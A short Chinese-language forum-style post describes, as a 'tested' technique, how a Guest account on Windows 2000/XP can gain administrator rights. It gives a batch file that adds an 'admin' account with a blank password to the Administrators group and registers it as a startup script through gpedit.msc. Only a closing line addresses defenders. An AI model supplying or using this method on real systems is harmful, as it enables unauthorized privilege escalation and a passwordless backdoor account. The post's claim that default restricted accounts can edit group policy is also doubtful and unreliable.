2K XP guest提權的方法(已測試可以用)
大家知道,在Windows 2000/XP 中,如果你是管理員,就算不知道其他用戶(管理員)的密碼,還是可以用 Net User 帳戶 密碼 更改其密碼。據說MS是爲了用
戶的方便(如用戶忘記密碼),此外,用戶還可以用Net Localgroup Administrators帳戶 /add 命令來將帳戶添加到管理員組。
但是,如果你不是管理員,如Guest帳戶,表面上是不可以使用上述命令的,但我們可以通過某種渠道來使用它。
例:以 Guest帳戶身份創建一個管理員
一、 創建一個批處理文件,內容如下:
net user admin /add
net localgroup administrators admin /add
net localgroup administrators admin /add
將上述的批處理文件保存爲 admin.bat.
注:上述批處理文件作用是創建一個名爲 admin 的管理員帳戶(密碼爲空)。
二、將此批處理文件作爲Windows 的開機啓動腳本。
1、在 運行 對話框中輸入 gpedit.msc
2、定位到 計算機配置一>Windows設置一>腳本 (啓動/關機), 雙擊右邊窗口的 啓動,在其中添加先前創建的 admin.bat。
3、重新啓動計算機,系統便有了一個名爲admin 的管理員
上述操作在Windows 2000/XP中可行,但要保證帳戶可以訪問註冊表,組策略(創建帳戶的操作實際上也就是在註冊表中添加相應的項和值),而Windows中的缺省的Guest/受限帳戶並無此限制。
或許,我們並不需要用Guest帳戶去創建一個管理員,但設想如果某個程序只有管理員可執行,是否也就可用上述的方法來實現呢?
小結:Windows系統默認對Guest/受限帳戶的限制只是表面上的,作爲一個有經驗的系統管理員,要做的事情還很多,起碼應該禁止受限用戶訪問/修改註冊表,組策略等。